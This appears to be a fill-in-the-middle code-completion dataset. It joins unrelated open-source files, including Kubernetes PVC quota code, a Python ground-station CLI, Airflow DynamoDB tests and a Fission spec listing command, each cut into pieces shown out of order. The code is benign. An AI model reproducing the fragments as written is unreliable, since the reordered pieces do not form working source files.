getGoodsList: function() {
var self = this;
if (self.data.tab == 3) {
return;
}
if (self.data.loading) {
return;
}
if (self.data.no_more) {
return;
}
self.setData({
loading: true,
});
var current_page = self.data.current_page || 0;
var target_page = current_page + 1;
getApp().request({
url: getApp().api.mch.shop,
data: {
mch_id: self.data.mch_id,
tab: self.data.tab,
sort: self.data.sort,
page: target_page,
cat_id: self.data.cat_id,
},
success: function(res) {
if (res.code == 0) {
if (self.data.tab == 1) {
if (res.data.goods_list && res.data.goods_list.length) {
self.data.hot_list = self.data.hot_list.concat(res.data.goods_list);
self.setData({
hot_list: self.data.hot_list,
current_page: target_page,
});
} else {
self.setData({
no_more: true,
});
}
}
if (self.data.tab == 2) {
if (res.data.goods_list && res.data.goods_list.length) {
self.data.goods_list = self.data.goods_list.concat(res.data.goods_list);
self.setData({
goods_list: self.data.goods_list,
current_page: target_page,
});
} else {
self.setData({
no_more: true,
});
}
}
}
},
complete: function() {
self.setData({
loading: false,
});
}
});
},
}); | */
|
persistent_volume_claims.go | /*
Copyright 2016 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package core
import (
"fmt"
"strings"
corev1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/resource"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/runtime/schema"
"k8s.io/apiserver/pkg/admission"
quota "k8s.io/apiserver/pkg/quota/v1"
"k8s.io/apiserver/pkg/quota/v1/generic"
utilfeature "k8s.io/apiserver/pkg/util/feature"
api "k8s.io/kubernetes/pkg/apis/core"
k8s_api_v1 "k8s.io/kubernetes/pkg/apis/core/v1"
"k8s.io/kubernetes/pkg/apis/core/v1/helper"
k8sfeatures "k8s.io/kubernetes/pkg/features"
)
// the name used for object count quota
var pvcObjectCountName = generic.ObjectCountQuotaResourceNameFor(corev1.SchemeGroupVersion.WithResource("persistentvolumeclaims").GroupResource())
// pvcResources are the set of static resources managed by quota associated with pvcs.
// for each resource in this list, it may be refined dynamically based on storage class.
var pvcResources = []corev1.ResourceName{
corev1.ResourcePersistentVolumeClaims,
corev1.ResourceRequestsStorage,
}
// storageClassSuffix is the suffix to the qualified portion of storage class resource name.
// For example, if you want to quota storage by storage class, you would have a declaration
// that follows <storage-class>.storageclass.storage.k8s.io/<resource>.
// For example:
// * gold.storageclass.storage.k8s.io/requests.storage: 500Gi
// * bronze.storageclass.storage.k8s.io/requests.storage: 500Gi
const storageClassSuffix string = ".storageclass.storage.k8s.io/"
/* TODO: prune?
// ResourceByStorageClass returns a quota resource name by storage class.
func ResourceByStorageClass(storageClass string, resourceName corev1.ResourceName) corev1.ResourceName {
return corev1.ResourceName(string(storageClass + storageClassSuffix + string(resourceName)))
}
*/
// V1ResourceByStorageClass returns a quota resource name by storage class.
func V1ResourceByStorageClass(storageClass string, resourceName corev1.ResourceName) corev1.ResourceName {
return corev1.ResourceName(string(storageClass + storageClassSuffix + string(resourceName)))
}
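// For example, V1ResourceByStorageClass("gold", corev1.ResourceRequestsStorage)
// returns the resource name "gold.storageclass.storage.k8s.io/requests.storage".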
// NewPersistentVolumeClaimEvaluator returns an evaluator that can evaluate persistent volume claims
func NewPersistentVolumeClaimEvaluator(f quota.ListerForResourceFunc) quota.Evaluator {
listFuncByNamespace := generic.ListResourceUsingListerFunc(f, corev1.SchemeGroupVersion.WithResource("persistentvolumeclaims"))
pvcEvaluator := &pvcEvaluator{listFuncByNamespace: listFuncByNamespace}
return pvcEvaluator
}
// pvcEvaluator knows how to evaluate quota usage for persistent volume claims
type pvcEvaluator struct {
// listFuncByNamespace knows how to list pvc claims
listFuncByNamespace generic.ListFuncByNamespace
}
// Constraints verifies that all required resources are present on the item.
func (p *pvcEvaluator) Constraints(required []corev1.ResourceName, item runtime.Object) error {
// no-op for persistent volume claims
return nil
}
// GroupResource that this evaluator tracks
func (p *pvcEvaluator) GroupResource() schema.GroupResource {
return corev1.SchemeGroupVersion.WithResource("persistentvolumeclaims").GroupResource()
}
// Handles returns true if the evaluator should handle the specified operation.
func (p *pvcEvaluator) Handles(a admission.Attributes) bool {
op := a.GetOperation() | return true
}
return false
}
// Matches returns true if the evaluator matches the specified quota with the provided input item
func (p *pvcEvaluator) Matches(resourceQuota *corev1.ResourceQuota, item runtime.Object) (bool, error) {
return generic.Matches(resourceQuota, item, p.MatchingResources, generic.MatchesNoScopeFunc)
}
// MatchingScopes takes the input specified list of scopes and input object. Returns the set of scopes resource matches.
func (p *pvcEvaluator) MatchingScopes(item runtime.Object, scopes []corev1.ScopedResourceSelectorRequirement) ([]corev1.ScopedResourceSelectorRequirement, error) {
return []corev1.ScopedResourceSelectorRequirement{}, nil
}
// UncoveredQuotaScopes takes the input matched scopes which are limited by configuration and the matched quota scopes.
// It returns the scopes which are in limited scopes but don't have a corresponding covering quota scope
func (p *pvcEvaluator) UncoveredQuotaScopes(limitedScopes []corev1.ScopedResourceSelectorRequirement, matchedQuotaScopes []corev1.ScopedResourceSelectorRequirement) ([]corev1.ScopedResourceSelectorRequirement, error) {
return []corev1.ScopedResourceSelectorRequirement{}, nil
}
// MatchingResources takes the input specified list of resources and returns the set of resources it matches.
func (p *pvcEvaluator) MatchingResources(items []corev1.ResourceName) []corev1.ResourceName {
result := []corev1.ResourceName{}
for _, item := range items {
// match object count quota fields
if quota.Contains([]corev1.ResourceName{pvcObjectCountName}, item) {
result = append(result, item)
continue
}
// match pvc resources
if quota.Contains(pvcResources, item) {
result = append(result, item)
continue
}
// match pvc resources scoped by storage class (<storage-class-name>.storageclass.storage.k8s.io/<resource>)
for _, resource := range pvcResources {
byStorageClass := storageClassSuffix + string(resource)
if strings.HasSuffix(string(item), byStorageClass) {
result = append(result, item)
break
}
}
}
return result
}
// Usage knows how to measure usage associated with item.
func (p *pvcEvaluator) Usage(item runtime.Object) (corev1.ResourceList, error) {
result := corev1.ResourceList{}
pvc, err := toExternalPersistentVolumeClaimOrError(item)
if err != nil {
return result, err
}
// charge for claim
result[corev1.ResourcePersistentVolumeClaims] = *(resource.NewQuantity(1, resource.DecimalSI))
result[pvcObjectCountName] = *(resource.NewQuantity(1, resource.DecimalSI))
storageClassRef := helper.GetPersistentVolumeClaimClass(pvc)
if len(storageClassRef) > 0 {
storageClassClaim := corev1.ResourceName(storageClassRef + storageClassSuffix + string(corev1.ResourcePersistentVolumeClaims))
result[storageClassClaim] = *(resource.NewQuantity(1, resource.DecimalSI))
}
// charge for storage
if request, found := pvc.Spec.Resources.Requests[corev1.ResourceStorage]; found {
roundedRequest := request.DeepCopy()
if !roundedRequest.RoundUp(0) {
// Ensure storage requests are counted as whole byte values, to pass resourcequota validation.
// See http://issue.k8s.io/94313
request = roundedRequest
}
result[corev1.ResourceRequestsStorage] = request
// charge usage to the storage class (if present)
if len(storageClassRef) > 0 {
storageClassStorage := corev1.ResourceName(storageClassRef + storageClassSuffix + string(corev1.ResourceRequestsStorage))
result[storageClassStorage] = request
}
}
return result, nil
}
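// As a concrete reading of the logic above: a claim with storage class "gold"
// requesting 1Gi is charged persistentvolumeclaims=1, count/persistentvolumeclaims=1,
// requests.storage=1Gi, plus the same claim count and storage quantities under the
// "gold.storageclass.storage.k8s.io/"-prefixed resource names.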
// UsageStats calculates aggregate usage for the object.
func (p *pvcEvaluator) UsageStats(options quota.UsageStatsOptions) (quota.UsageStats, error) {
return generic.CalculateUsageStats(options, p.listFuncByNamespace, generic.MatchesNoScopeFunc, p.Usage)
}
// ensure we implement required interface
var _ quota.Evaluator = &pvcEvaluator{}
func toExternalPersistentVolumeClaimOrError(obj runtime.Object) (*corev1.PersistentVolumeClaim, error) {
pvc := &corev1.PersistentVolumeClaim{}
switch t := obj.(type) {
case *corev1.PersistentVolumeClaim:
pvc = t
case *api.PersistentVolumeClaim:
if err := k8s_api_v1.Convert_core_PersistentVolumeClaim_To_v1_PersistentVolumeClaim(t, pvc, nil); err != nil {
return nil, err
}
default:
return nil, fmt.Errorf("expect *api.PersistentVolumeClaim or *v1.PersistentVolumeClaim, got %v", t)
}
return pvc, nil
} | if op == admission.Create {
return true
}
if op == admission.Update && utilfeature.DefaultFeatureGate.Enabled(k8sfeatures.ExpandPersistentVolumes) { |
issue-23304-2.rs | // Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
#![allow(dead_code)]
enum X { A = 0 as isize }
enum Y { A = X::A as isize }
fn | () { }
| main |
station.py | import logging
from numpy import degrees, pi, radians
from beyond.frames import get_frame, create_station
from beyond.errors import UnknownFrameError
from .wspace import ws
from .utils import dms2deg, deg2dms
log = logging.getLogger(__name__)
class StationDb:
def __new__(cls):
if not hasattr(cls, "_instance"):
# Singleton
cls._instance = super().__new__(cls)
return cls._instance
@classmethod
def list(cls):
self = cls()
if not hasattr(self, "_stations"):
self._stations = {}
for abbr, charact in ws.config["stations"].items():
charact["parent_frame"] = get_frame(charact["parent_frame"])
full_name = charact.pop("name")
mask = charact.get("mask")
if mask:
# reverse direction of the mask to put it in counterclockwise
# to comply with the mathematical definition
charact["mask"] = (
(2 * pi - radians(mask["azims"][::-1])),
radians(mask["elevs"][::-1]),
)
# Deletion of all unknown characteristics from the charact dict
# and conversion to object attributes (they may be used by addons)
extra_charact = {}
for key in list(charact.keys()):
if key not in ("parent_frame", "latlonalt", "mask"):
extra_charact[key] = charact.pop(key)
self._stations[abbr] = create_station(abbr, **charact)
self._stations[abbr].abbr = abbr
self._stations[abbr].full_name = full_name
for key, value in extra_charact.items():
setattr(self._stations[abbr], key, value)
return self._stations
@classmethod
def get(cls, name):
self = cls()
try:
return get_frame(name)
except UnknownFrameError:
if name not in self.list().keys():
raise
return self.list()[name]
@classmethod
def save(cls, station):
self = cls()
ws.config["stations"].update(station)
ws.config.save()
if hasattr(self, "_stations"):
del self._stations
def wshook(cmd, *args, **kwargs):
if cmd in ("init", "full-init"):
name = "TLS"
ws.config.setdefault("stations", {})
try:
StationDb.get(name)
except UnknownFrameError:
StationDb.save(
{
name: {
"latlonalt": [43.604482, 1.443962, 172.0],
"name": "Toulouse",
"parent_frame": "WGS84",
}
}
)
log.info("Station {} created".format(name))
else:
log.warning("Station {} already exists".format(name))
def space_station(*argv):
| """Stations management
Usage:
space-station list [--map] [<abbr>]
space-station create <abbr> <name> <lat> <lon> <alt>
Options
list List available stations
create Interactively create a station
<abbr> Abbreviation
<name> Name of the station
<lat> Latitude in degrees
<lon> Longitude in degrees
<alt> Altitude in meters
-m, --map Display the station on a map
Latitude and longitude both accept degrees as float or as
degrees, minutes and seconds of arc (e.g. 43°25'12")
"""
from pathlib import Path
import matplotlib.pyplot as plt
from .utils import docopt
from .map.background import set_background
args = docopt(space_station.__doc__)
station = StationDb()
if args["create"]:
abbr = args["<abbr>"]
name = args["<name>"]
latitude = args["<lat>"]
longitude = args["<lon>"]
altitude = args["<alt>"]
if "°" in latitude:
latitude = dms2deg(latitude)
else:
latitude = float(latitude)
if "°" in longitude:
longitude = dms2deg(longitude)
else:
longitude = float(longitude)
altitude = float(altitude)
log.info("Creation of station '{}' ({})".format(name, abbr))
log.debug(
"{} {}, altitude : {} m".format(
deg2dms(latitude, "lat"), deg2dms(longitude, "lon"), altitude
)
)
StationDb.save(
{
abbr: {
"name": name,
"latlonalt": (latitude, longitude, altitude),
"parent_frame": "WGS84",
}
}
)
else:
stations = []
for station in sorted(station.list().values(), key=lambda x: x.abbr):
if args["<abbr>"] and station.abbr != args["<abbr>"]:
continue
print(station.name)
print("-" * len(station.name))
lat, lon, alt = station.latlonalt
lat, lon = degrees([lat, lon])
print("name: {}".format(station.full_name))
print(
"altitude: {} m\nposition: {}, {}".format(
alt, deg2dms(lat, "lat"), deg2dms(lon, "lon")
)
)
print()
stations.append((station.name, lat, lon))
if args["--map"]:
plt.figure(figsize=(15.2, 8.2))
set_background()
plt.subplots_adjust(left=0.02, right=0.98, top=0.98, bottom=0.02)
plt.show()
|
|
frozen_pb.py | # -*- coding: utf-8 -*-
# Copyright (c) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tensorflow frozen pb model."""
from ..model_type_getter import get_model_type
from .model import TensorflowModel as TFModel
class FrozenPbModel(TFModel):
"""Frozen pb model."""
@staticmethod
def supports_path(path: str) -> bool:
| """Check if given path is of supported model."""
return "frozen_pb" == get_model_type(path) |
|
test_aws_dynamodb_hook.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import unittest
import uuid
from airflow.providers.amazon.aws.hooks.aws_dynamodb_hook import AwsDynamoDBHook
try:
from moto import mock_dynamodb2
except ImportError:
mock_dynamodb2 = None
| @unittest.skipIf(mock_dynamodb2 is None, 'mock_dynamodb2 package not present')
@mock_dynamodb2
def test_get_conn_returns_a_boto3_connection(self):
hook = AwsDynamoDBHook(aws_conn_id='aws_default')
self.assertIsNotNone(hook.get_conn())
@unittest.skipIf(mock_dynamodb2 is None, 'mock_dynamodb2 package not present')
@mock_dynamodb2
def test_insert_batch_items_dynamodb_table(self):
hook = AwsDynamoDBHook(aws_conn_id='aws_default',
table_name='test_airflow', table_keys=['id'], region_name='us-east-1')
# this table needs to be created in production
table = hook.get_conn().create_table(
TableName='test_airflow',
KeySchema=[
{
'AttributeName': 'id',
'KeyType': 'HASH'
},
],
AttributeDefinitions=[
{
'AttributeName': 'id',
'AttributeType': 'S'
}
],
ProvisionedThroughput={
'ReadCapacityUnits': 10,
'WriteCapacityUnits': 10
}
)
table = hook.get_conn().Table('test_airflow')
items = [{'id': str(uuid.uuid4()), 'name': 'airflow'}
for _ in range(10)]
hook.write_batch_data(items)
table.meta.client.get_waiter(
'table_exists').wait(TableName='test_airflow')
self.assertEqual(table.item_count, 10)
if __name__ == '__main__':
unittest.main() | class TestDynamoDBHook(unittest.TestCase):
|
analyzer.rs | use crate::{cfg::CFG, ssa::builder::SSABuilder};
use sifc_bytecode::instr::Instr;
pub struct Analyzer {
program: Vec<Instr>,
}
impl Analyzer {
pub fn new(v: Vec<Instr>) -> Analyzer {
Analyzer { program: v }
}
pub fn build_cfg(&self) -> CFG {
CFG::build(&self.program)
}
pub fn build_ssa(&self) -> CFG |
pub fn perform(&self) {
self.build_ssa();
}
}
| {
let cfg = CFG::build(&self.program);
let mut ssab = SSABuilder::new(&cfg);
ssab.build();
cfg
} |
list.go | /*
Copyright 2019 The Fission Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package spec
import (
"fmt"
"os"
"strings"
"text/tabwriter"
"time"
"github.com/pkg/errors"
fv1 "github.com/fission/fission/pkg/apis/core/v1"
"github.com/fission/fission/pkg/controller/client"
"github.com/fission/fission/pkg/fission-cli/cliwrapper/cli"
"github.com/fission/fission/pkg/fission-cli/cmd"
flagkey "github.com/fission/fission/pkg/fission-cli/flag/key"
"github.com/fission/fission/pkg/fission-cli/util"
)
// ListSubCommand struct
type ListSubCommand struct {
cmd.CommandActioner
}
// List lists resources in the spec.
func List(input cli.Input) error {
return (&ListSubCommand{}).do(input)
}
func (opts *ListSubCommand) do(input cli.Input) error {
return opts.run(input)
}
func (opts *ListSubCommand) run(input cli.Input) error {
deployID := input.String(flagkey.SpecDeployID)
if len(deployID) == 0 {
// get specdir, specignore and read the deployID
specDir := util.GetSpecDir(input)
specIgnore := util.GetSpecIgnore(input)
fr, err := ReadSpecs(specDir, specIgnore)
if err != nil {
return errors.Wrap(err, "error reading specs")
}
deployID = fr.DeploymentConfig.UID
}
allfn, err := getAllFunctions(opts.Client())
if err != nil {
return errors.Wrap(err, "error getting Functions from all namespaces")
}
specfns := getAppliedFunctions(allfn, deployID)
ShowFunctions(specfns)
allenvs, err := getAllEnvironments(opts.Client())
if err != nil {
return errors.Wrap(err, "error getting Environments from all namespaces")
}
specenvs := getAppliedEnvironments(allenvs, deployID)
ShowEnvironments(specenvs)
pkglists, err := getAllPackages(opts.Client())
if err != nil {
return errors.Wrap(err, "error getting Packages from all namespaces")
}
specPkgs := getAppliedPackages(pkglists, deployID)
ShowPackages(specPkgs)
canaryCfgs, err := getAllCanaryConfigs(opts.Client())
if err != nil {
return errors.Wrap(err, "error getting Canary Config from all namespaces")
}
specCanaryCfgs := getAppliedCanaryConfigs(canaryCfgs, deployID)
ShowCanaryConfigs(specCanaryCfgs)
hts, err := getAllHTTPTriggers(opts.Client())
if err != nil {
return errors.Wrap(err, "error getting HTTP Triggers from all namespaces")
}
specHTTPTriggers := getAppliedHTTPTriggers(hts, deployID)
ShowHTTPTriggers(specHTTPTriggers)
mqts, err := getAllMessageQueueTriggers(opts.Client(), input.String(flagkey.MqtMQType))
if err != nil {
return errors.Wrap(err, "error getting MessageQueue Triggers from all namespaces")
}
specMessageQueueTriggers := getAppliedMessageQueueTriggers(mqts, deployID)
ShowMQTriggers(specMessageQueueTriggers)
tts, err := getAllTimeTriggers(opts.Client())
if err != nil {
return errors.Wrap(err, "error getting Time Triggers from all namespaces")
}
specTimeTriggers := getAppliedTimeTriggers(tts, deployID)
ShowTimeTriggers(specTimeTriggers)
kws, err := getAllKubeWatchTriggers(opts.Client())
if err != nil {
return errors.Wrap(err, "error getting Kube Watchers from all namespaces")
}
specKubeWatchers := getSpecKubeWatchers(kws, deployID)
ShowAppliedKubeWatchers(specKubeWatchers)
return nil
}
func getAppliedFunctions(fns []fv1.Function, deployID string) []fv1.Function {
var fnlist []fv1.Function
if len(fns) > 0 {
for _, f := range fns {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
fnlist = append(fnlist, f)
}
}
}
return fnlist
}
func getAppliedEnvironments(envs []fv1.Environment, deployID string) []fv1.Environment {
var envlist []fv1.Environment
if len(envs) > 0 {
for _, f := range envs {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
envlist = append(envlist, f)
}
}
}
return envlist
}
func getAppliedPackages(pkgs []fv1.Package, deployID string) []fv1.Package {
var pkglist []fv1.Package
if len(pkgs) > 0 {
for _, f := range pkgs {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
pkglist = append(pkglist, f)
}
}
}
return pkglist
}
func getAppliedCanaryConfigs(canaryCfgs []fv1.CanaryConfig, deployID string) []fv1.CanaryConfig {
var canaryConfiglist []fv1.CanaryConfig
if len(canaryCfgs) > 0 {
for _, f := range canaryCfgs {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
canaryConfiglist = append(canaryConfiglist, f)
}
}
}
return canaryConfiglist
}
func getAppliedHTTPTriggers(hts []fv1.HTTPTrigger, deployID string) []fv1.HTTPTrigger {
var httpTriggerlist []fv1.HTTPTrigger
if len(hts) > 0 {
for _, f := range hts {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
httpTriggerlist = append(httpTriggerlist, f)
}
}
}
return httpTriggerlist
}
func getAppliedMessageQueueTriggers(mqts []fv1.MessageQueueTrigger, deployID string) []fv1.MessageQueueTrigger {
var mqTriggerlist []fv1.MessageQueueTrigger
if len(mqts) > 0 {
for _, f := range mqts {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
mqTriggerlist = append(mqTriggerlist, f)
}
}
}
return mqTriggerlist
}
func getAppliedTimeTriggers(tts []fv1.TimeTrigger, deployID string) []fv1.TimeTrigger {
var timeTriggerlist []fv1.TimeTrigger
if len(tts) > 0 {
for _, f := range tts {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
timeTriggerlist = append(timeTriggerlist, f)
}
}
}
return timeTriggerlist
}
func getSpecKubeWatchers(ws []fv1.KubernetesWatchTrigger, deployID string) []fv1.KubernetesWatchTrigger {
var kubeWatchTriggerlist []fv1.KubernetesWatchTrigger
if len(ws) > 0 {
for _, f := range ws {
if f.ObjectMeta.Annotations["fission-uid"] == deployID {
kubeWatchTriggerlist = append(kubeWatchTriggerlist, f)
}
}
}
return kubeWatchTriggerlist
}
// ShowFunctions displays info of Functions
func ShowFunctions(fns []fv1.Function) {
if len(fns) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Fprintf(w, "%v\n", "Functions:")
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n", "NAME", "ENV", "EXECUTORTYPE", "MINSCALE", "MAXSCALE", "MINCPU", "MAXCPU", "MINMEMORY", "MAXMEMORY", "TARGETCPU", "SECRETS", "CONFIGMAPS")
for _, f := range fns {
secrets := f.Spec.Secrets
configMaps := f.Spec.ConfigMaps
var secretsList, configMapList []string
for _, secret := range secrets {
secretsList = append(secretsList, secret.Name)
}
for _, configMap := range configMaps {
configMapList = append(configMapList, configMap.Name)
}
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n",
f.ObjectMeta.Name, f.Spec.Environment.Name,
f.Spec.InvokeStrategy.ExecutionStrategy.ExecutorType,
f.Spec.InvokeStrategy.ExecutionStrategy.MinScale,
f.Spec.InvokeStrategy.ExecutionStrategy.MaxScale,
f.Spec.Resources.Requests.Cpu().String(), | f.Spec.InvokeStrategy.ExecutionStrategy.TargetCPUPercent,
strings.Join(secretsList, ","),
strings.Join(configMapList, ","))
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// ShowEnvironments displays info of Environments
func ShowEnvironments(envs []fv1.Environment) {
if len(envs) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Fprintf(w, "%v\n", "Environments:")
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n", "NAME", "IMAGE", "BUILDER_IMAGE", "POOLSIZE", "MINCPU", "MAXCPU", "MINMEMORY", "MAXMEMORY", "EXTNET", "GRACETIME")
for _, env := range envs {
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n",
env.ObjectMeta.Name, env.Spec.Runtime.Image, env.Spec.Builder.Image, env.Spec.Poolsize,
env.Spec.Resources.Requests.Cpu(), env.Spec.Resources.Limits.Cpu(),
env.Spec.Resources.Requests.Memory(), env.Spec.Resources.Limits.Memory(),
env.Spec.AllowAccessToExternalNetwork, env.Spec.TerminationGracePeriod)
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// ShowPackages displays info of Packages
func ShowPackages(pkgList []fv1.Package) {
if len(pkgList) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Fprintf(w, "%v\n", "Packages:")
fmt.Fprintf(w, "%v\t%v\t%v\t%v\n", "NAME", "BUILD_STATUS", "ENV", "LASTUPDATEDAT")
for _, pkg := range pkgList {
fmt.Fprintf(w, "%v\t%v\t%v\t%v\n", pkg.ObjectMeta.Name, pkg.Status.BuildStatus, pkg.Spec.Environment.Name, pkg.Status.LastUpdateTimestamp.Format(time.RFC822))
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// ShowCanaryConfigs displays info of Canary Configs
func ShowCanaryConfigs(canaryCfgs []fv1.CanaryConfig) {
if len(canaryCfgs) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Fprintf(w, "%v\n", "Canary Config:")
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n", "NAME", "TRIGGER", "FUNCTION-N", "FUNCTION-N-1", "WEIGHT-INCREMENT", "INTERVAL", "FAILURE-THRESHOLD", "FAILURE-TYPE", "STATUS")
for _, canaryCfg := range canaryCfgs {
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n",
canaryCfg.ObjectMeta.Name, canaryCfg.Spec.Trigger, canaryCfg.Spec.NewFunction, canaryCfg.Spec.OldFunction, canaryCfg.Spec.WeightIncrement, canaryCfg.Spec.WeightIncrementDuration,
canaryCfg.Spec.FailureThreshold, canaryCfg.Spec.FailureType, canaryCfg.Status.Status)
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// ShowHTTPTriggers displays info of HTTP Triggers
func ShowHTTPTriggers(hts []fv1.HTTPTrigger) {
if len(hts) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Fprintf(w, "%v\n", "HTTP Triggers:")
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n", "NAME", "METHOD", "URL", "FUNCTION(s)", "INGRESS", "HOST", "PATH", "TLS", "ANNOTATIONS")
for _, trigger := range hts {
function := ""
if trigger.Spec.FunctionReference.Type == fv1.FunctionReferenceTypeFunctionName {
function = trigger.Spec.FunctionReference.Name
} else {
for k, v := range trigger.Spec.FunctionReference.FunctionWeights {
function += fmt.Sprintf("%s:%v ", k, v)
}
}
host := trigger.Spec.Host
if len(trigger.Spec.IngressConfig.Host) > 0 {
host = trigger.Spec.IngressConfig.Host
}
path := trigger.Spec.RelativeURL
if trigger.Spec.Prefix != nil && *trigger.Spec.Prefix != "" {
path = *trigger.Spec.Prefix
}
if len(trigger.Spec.IngressConfig.Path) > 0 {
path = trigger.Spec.IngressConfig.Path
}
var msg []string
for k, v := range trigger.Spec.IngressConfig.Annotations {
msg = append(msg, fmt.Sprintf("%v: %v", k, v))
}
ann := strings.Join(msg, ", ")
methods := []string{}
if len(trigger.Spec.Method) > 0 {
methods = append(methods, trigger.Spec.Method)
}
if len(trigger.Spec.Methods) > 0 {
methods = trigger.Spec.Methods
}
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n",
trigger.ObjectMeta.Name, methods, trigger.Spec.RelativeURL, function, trigger.Spec.CreateIngress, host, path, trigger.Spec.IngressConfig.TLS, ann)
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// ShowMQTriggers displays info of MessageQueue Triggers
func ShowMQTriggers(mqts []fv1.MessageQueueTrigger) {
if len(mqts) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Printf("\nMessageQueue Triggers:\n")
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n", "NAME", "FUNCTION_NAME", "MESSAGE_QUEUE_TYPE", "TOPIC", "RESPONSE_TOPIC", "ERROR_TOPIC", "MAX_RETRIES", "PUB_MSG_CONTENT_TYPE")
for _, mqt := range mqts {
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\t%v\t%v\t%v\n",
mqt.ObjectMeta.Name, mqt.Spec.FunctionReference.Name, mqt.Spec.MessageQueueType, mqt.Spec.Topic, mqt.Spec.ResponseTopic, mqt.Spec.ErrorTopic, mqt.Spec.MaxRetries, mqt.Spec.ContentType)
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// ShowTimeTriggers displays info of Time Triggers
func ShowTimeTriggers(tts []fv1.TimeTrigger) {
if len(tts) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Fprintf(w, "%v", "Time Triggers:\n")
fmt.Fprintf(w, "%v\t%v\t%v\n", "NAME", "CRON", "FUNCTION_NAME")
for _, tt := range tts {
fmt.Fprintf(w, "%v\t%v\t%v\n",
tt.ObjectMeta.Name, tt.Spec.Cron, tt.Spec.FunctionReference.Name)
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// ShowAppliedKubeWatchers displays info of kube watchers
func ShowAppliedKubeWatchers(ws []fv1.KubernetesWatchTrigger) {
if len(ws) > 0 {
w := tabwriter.NewWriter(os.Stdout, 0, 0, 1, ' ', 0)
fmt.Fprintf(w, "%v", "Kube Watchers:\n")
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\n", "NAME", "NAMESPACE", "OBJTYPE", "LABELS", "FUNCTION_NAME")
for _, wa := range ws {
fmt.Fprintf(w, "%v\t%v\t%v\t%v\t%v\n",
wa.ObjectMeta.Name, wa.Spec.Namespace, wa.Spec.Type, wa.Spec.LabelSelector, wa.Spec.FunctionReference.Name)
}
fmt.Fprintf(w, "\n")
w.Flush()
}
}
// getAllFunctions gets the list of functions in all namespaces
